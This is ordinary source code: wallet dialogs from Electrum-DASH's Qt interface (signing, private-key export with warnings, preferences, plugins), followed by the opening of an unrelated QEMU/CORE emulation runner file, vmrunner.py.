bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = ("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message('Invalid Dash address.') return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh']: self.show_message('Cannot sign messages with this type of address.' 
+ '\n\n' + self.msg_sign) return if not self.wallet.is_mine(address): self.show_message('Address not in wallet.') return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): signature.setText(base64.b64encode(sig).decode('ascii')) self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message('Invalid Dash address.') return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = bitcoin.verify_message(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) 
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8'))) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: encrypted = bitcoin.encrypt_message(message, pubkey_e.text()) encrypted_e.setText(encrypted.decode('ascii')) except BaseException as e: traceback.print_exc(file=sys.stdout) self.show_warning(str(e)) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum_dash.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum-DASH was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum_dash import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: 
self.show_error(str(e)) return if not data: return # if the user scanned a dash URI if str(data).startswith("dash:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx data = bh2u(bitcoin.base_decode(data, length=None, base=43)) tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): from electrum_dash.transaction import SerializationError text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return try: tx = self.tx_from_text(text) if tx: self.show_transaction(tx) except SerializationError as e: self.show_critical(_("Electrum-DASH was unable to deserialize the transaction:") + "\n" + str(e)) def do_process_from_file(self): from electrum_dash.transaction import SerializationError try: tx = self.read_tx_from_file() if tx: self.show_transaction(tx) except SerializationError as e: self.show_critical(_("Electrum-DASH was unable to deserialize the transaction:") + "\n" + str(e)) def do_process_from_txid(self): from electrum_dash import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: r = self.network.synchronous_get(('blockchain.transaction.get',[txid])) except BaseException as e: self.show_message(str(e)) return tx = transaction.Transaction(r) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) 
return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It can not be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(850, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-dash-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... 
%d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum-DASH was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: import json f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): labelsFile = self.getOpenFileName(_("Open labels file"), "*.json") if not labelsFile: return try: with open(labelsFile, 'r') as f: data = f.read() for key, value in json.loads(data).items(): self.wallet.set_label(key, value) self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile)) except (IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to import your labels.") + "\n" + str(reason)) self.address_list.update() self.history_list.update() def do_export_labels(self): labels = self.wallet.labels try: fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_dash_labels.json', "*.json") if fileName: with open(fileName, 'w+') as f: json.dump(labels, f, indent=4, sort_keys=True) self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName)) except (IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to export your labels.") + "\n" + str(reason)) def export_history_dialog(self): d = 
WindowModalDialog(self, _('Export History')) d.setMinimumSize(400, 200) vbox = QVBoxLayout(d) defaultname = os.path.expanduser('~/electrum-dash-history.csv') select_msg = _('Select file to export your wallet transactions to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) vbox.addStretch(1) hbox = Buttons(CancelButton(d), OkButton(d, _('Export'))) vbox.addLayout(hbox) run_hook('export_history_dialog', self, hbox) self.update() if not d.exec_(): return filename = filename_e.text() if not filename: return try: self.do_export_history(self.wallet, filename, csv_button.isChecked()) except (IOError, os.error) as reason: export_error_label = _("Electrum-DASH was unable to produce a transaction export.") self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history")) return self.show_message(_("Your wallet history has been successfully exported.")) def plot_history_dialog(self): if plot_history is None: return wallet = self.wallet history = wallet.get_history() if len(history) > 0: plt = plot_history(self.wallet, history) plt.show() def do_export_history(self, wallet, fileName, is_csv): history = wallet.get_history() lines = [] for item in history: tx_hash, height, confirmations, timestamp, value, balance = item if height>0: if timestamp is not None: time_string = format_time(timestamp) else: time_string = _("unverified") else: time_string = _("unconfirmed") if value is not None: value_string = format_satoshis(value, True) else: value_string = '--' if tx_hash: label = wallet.get_label(tx_hash) else: label = "" if is_csv: lines.append([tx_hash, label, confirmations, value_string, time_string]) else: lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string}) with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f, lineterminator='\n') transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"]) for 
line in lines: transaction.writerow(line) else: import json f.write(json.dumps(lines, indent = 4)) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_("Enter private keys:"))) keys_e = ScanQRTextEdit() keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text) f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(f) address_e.textChanged.connect(f) address_e.textChanged.connect(on_address) if not d.exec_(): return from electrum_dash.wallet import sweep_preparations try: self.do_clear() coins, keypairs = sweep_preparations(get_pk(), self.network) self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(get_address()) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) except BaseException as e: self.show_message(str(e)) return self.warn_if_watching_only() def _do_import(self, title, msg, func): text = text_dialog(self, title, msg + ' :', _('Import')) if not text: return bad = [] good = [] for key in str(text).split(): try: addr = func(key) good.append(addr) except BaseException as e: bad.append(key) continue if good: self.show_message(_("The following addresses were added") + ':\n' + 
'\n'.join(good)) if bad: self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad)) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses") self._do_import(title, msg, self.wallet.import_address) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title, msg = _('Import private keys'), _("Enter private keys") self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.refresh_headers() self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() tabs.setObjectName("settings_tab") gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum_dash.i18n import languages lang_combo.addItems(list(languages.values())) try: index = languages.keys().index(self.config.get("language",'')) except Exception: index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. 
For example, if this is set to 2, "1." will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) def on_dynfee(x): self.config.set_key('dynamic_fees', x == Qt.Checked) self.fee_slider.update() dynfee_cb = QCheckBox(_('Use dynamic fees')) dynfee_cb.setChecked(self.config.is_dynfee()) dynfee_cb.setToolTip(_("Use fees recommended by the server.")) fee_widgets.append((dynfee_cb, None)) dynfee_cb.stateChanged.connect(on_dynfee) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_e.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) self.fee_unit = self.config.get('fee_unit', 0) fee_unit_label = HelpLabel(_('Fee Unit') + ':', '') fee_unit_combo = QComboBox() fee_unit_combo.addItems([_('sat/byte'), _('mDASH/kB')]) fee_unit_combo.setCurrentIndex(self.fee_unit) def on_fee_unit(x): self.fee_unit = x self.config.set_key('fee_unit', x) self.fee_slider.update() fee_unit_combo.currentIndexChanged.connect(on_fee_unit) fee_widgets.append((fee_unit_label, fee_unit_combo)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see http://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', 
msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = ['DASH', 'mDASH', 'uDASH'] msg = _('Base unit of your wallet.')\ + '\n1DASH=1000mDASH.\n' \ + _(' These settings affects the fields in the Send tab')+' ' unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] if unit_result == 'DASH': 
self.decimal_point = 8 elif unit_result == 'mDASH': self.decimal_point = 5 elif unit_result == 'uDASH': self.decimal_point = 2 else: raise Exception('Unknown base unit') self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum_dash import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) usechange_cb = QCheckBox(_('Use change addresses')) usechange_cb.setChecked(self.wallet.use_change) if not 
self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False) def on_usechange(x): usechange_result = x == Qt.Checked if self.wallet.use_change != usechange_result: self.wallet.use_change = usechange_result self.wallet.storage.put('use_change', self.wallet.use_change) multiple_cb.setEnabled(self.wallet.use_change) usechange_cb.stateChanged.connect(on_usechange) usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.')) tx_widgets.append((usechange_cb, None)) def on_multiple(x): multiple = x == Qt.Checked if self.wallet.multiple_change != multiple: self.wallet.multiple_change = multiple self.wallet.storage.put('multiple_change', multiple) multiple_change = self.wallet.multiple_change multiple_cb = QCheckBox(_('Use multiple change addresses')) multiple_cb.setEnabled(self.wallet.use_change) multiple_cb.setToolTip('\n'.join([ _('In some cases, use up to 3 change addresses in order to break ' 'up large coin amounts and obfuscate the recipient address.'), _('This may result in higher transactions fees.') ])) multiple_cb.setChecked(multiple_change) multiple_cb.stateChanged.connect(on_multiple) tx_widgets.append((multiple_cb, None)) def fmt_docs(key, klass): lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")] return '\n'.join([key, "", " ".join(lines)]) choosers = sorted(coinchooser.COIN_CHOOSERS.keys()) chooser_name = coinchooser.get_name(self.config) msg = _('Choose coin (UTXO) selection method. 
The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) def on_currency(hh): if 
not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_list.refresh_headers() if self.fx.is_enabled() and checked: # reset timeout to get historical rates self.fx.timeout = 0 def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('Appearance')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.timeout = 0 
        # --- tail of the settings dialog handler (its `def` is above this chunk) ---
        # Dialog is closed: stop re-colouring the alias field on network replies.
        self.alias_received_signal.disconnect(set_alias_color)
        run_hook('close_settings_dialog')
        if self.need_restart:
            self.show_warning(_('Please restart Electrum-DASH to activate the new GUI settings'), title=_('Success'))

    def closeEvent(self, event):
        """Qt close handler; guards against rare double invocation."""
        # It seems in some rare cases this closeEvent() is called twice
        if not self.cleaned_up:
            self.cleaned_up = True
            self.clean_up()
        event.accept()

    def clean_up(self):
        """Persist window/console state and tear down wallet + network hooks."""
        self.wallet.thread.stop()
        if self.network:
            self.network.unregister_callback(self.on_network)
        self.config.set_key("is_maximized", self.isMaximized())
        # Only remember geometry for a non-maximized window; a maximized one
        # would otherwise be restored at full-screen size.
        if not self.isMaximized():
            g = self.geometry()
            self.wallet.storage.put("winpos-qt", [g.left(), g.top(), g.width(), g.height()])
        # Keep only the last 50 console entries to bound storage.
        self.config.set_key("console-history", self.console.history[-50:], True)
        if self.qr_window:
            self.qr_window.close()
        self.close_wallet()
        self.gui_object.close_window(self)

    def plugins_dialog(self):
        """Modal dialog listing all plugins with enable checkboxes and
        per-plugin settings widgets."""
        self.pluginsdialog = d = WindowModalDialog(self, _('Electrum-DASH Plugins'))
        plugins = self.gui_object.plugins
        vbox = QVBoxLayout(d)

        # plugins list lives inside a scroll area sized to the plugin count
        scroll = QScrollArea()
        scroll.setEnabled(True)
        scroll.setWidgetResizable(True)
        scroll.setMinimumSize(400, 250)
        vbox.addWidget(scroll)

        w = QWidget()
        scroll.setWidget(w)
        w.setMinimumHeight(plugins.count() * 35)

        grid = QGridLayout()
        grid.setColumnStretch(0, 1)
        w.setLayout(grid)

        # Cache of per-plugin settings widgets, keyed by plugin name, so a
        # widget is created at most once per dialog.
        settings_widgets = {}

        def enable_settings_widget(p, name, i):
            # Lazily create the settings widget for row i, then grey it out
            # unless the plugin is loaded and enabled.
            widget = settings_widgets.get(name)
            if not widget and p and p.requires_settings():
                widget = settings_widgets[name] = p.settings_widget(d)
                grid.addWidget(widget, i, 1)
            if widget:
                widget.setEnabled(bool(p and p.is_enabled()))

        def do_toggle(cb, name, i):
            # Checkbox handler: (un)load the plugin and sync UI state.
            p = plugins.toggle(name)
            cb.setChecked(bool(p))
            enable_settings_widget(p, name, i)
            run_hook('init_qt', self.gui_object)

        for i, descr in enumerate(plugins.descriptions.values()):
            name = descr['__name__']
            p = plugins.get(name)
            # Keystore plugins are managed elsewhere (wallet creation), not here.
            if descr.get('registers_keystore'):
                continue
            try:
                cb = QCheckBox(descr['fullname'])
                plugin_is_loaded = p is not None
                # Enabled when the plugin can be turned on (available for this
                # wallet) or turned off (loaded and user-disableable).
                cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                              or plugin_is_loaded and p.can_user_disable())
                cb.setEnabled(cb_enabled)
                cb.setChecked(plugin_is_loaded and p.is_enabled())
                grid.addWidget(cb, i, 0)
                enable_settings_widget(p, name, i)
                cb.clicked.connect(partial(do_toggle, cb, name, i))
                msg = descr['description']
                if descr.get('requires'):
                    msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
                grid.addWidget(HelpButton(msg), i, 2)
            except Exception:
                # A broken plugin descriptor must not break the whole dialog.
                self.print_msg("error: cannot display plugin", name)
                traceback.print_exc(file=sys.stdout)
        grid.setRowStretch(len(plugins.descriptions.values()), 1)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.exec_()

    def show_masternode_dialog(self):
        """Open the (modal) masternode management dialog."""
        d = MasternodeDialog(self.masternode_manager, self)
        d.exec_()

    def proposals_changed(self):
        """Callback for when proposals change."""
        if not self.masternode_manager:
            return
        self.update_proposals_tab()
vmrunner.py
""" Terminal Runner class """ __author__ = "Bruno Chianca Ferreira" __license__ = "MIT" __version__ = "0.5" __maintainer__ = "Bruno Chianca Ferreira" __email__ = "brunobcf@gmail.com" import traceback, os, logging, time, subprocess, threading from classes.runner.runner import Runner from core.nodes.base import CoreNode from classes.mobility import mobility class VMRunner(Runner): def __init__(self, emulation): self.setup(emulation) self.nodes_digest = {} self.iosocket_semaphore = False def setup(self, emulation): self.topology = emulation['vm']['topology'] self.number_of_nodes = emulation['vm']['number_of_nodes'] self.core = True if emulation['vm']['core'] == "True" else False self.disks = True if emulation['vm']['disks'] == "True" else False self.dump = True if emulation['vm']['dump'] == "True" else False self.mobility_model = emulation['vm']['mobility'] self.Mobility = mobility.Mobility(self, self.mobility_model) def start(self): self.run() def run(self): """ Runs the emulation of Virtual machines running QEMU """ #start core if self.core: self.core_topology() self.configure_batman() #start dumps if self.dump: #get simdir simdir = str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min) #createDumps(number_of_nodes, "./reports/" + simdir + "/tracer") if self.omnet: self.tcpdump(self.number_of_nodes, "./reports/" + simdir + "/tracer") if self.core: self.tcpdump_core(self.number_of_nodes, "./reports/" + simdir + "/tracer") if self.core: #pass sthread = threading.Thread(target=self.server_thread, args=()) sthread.start() 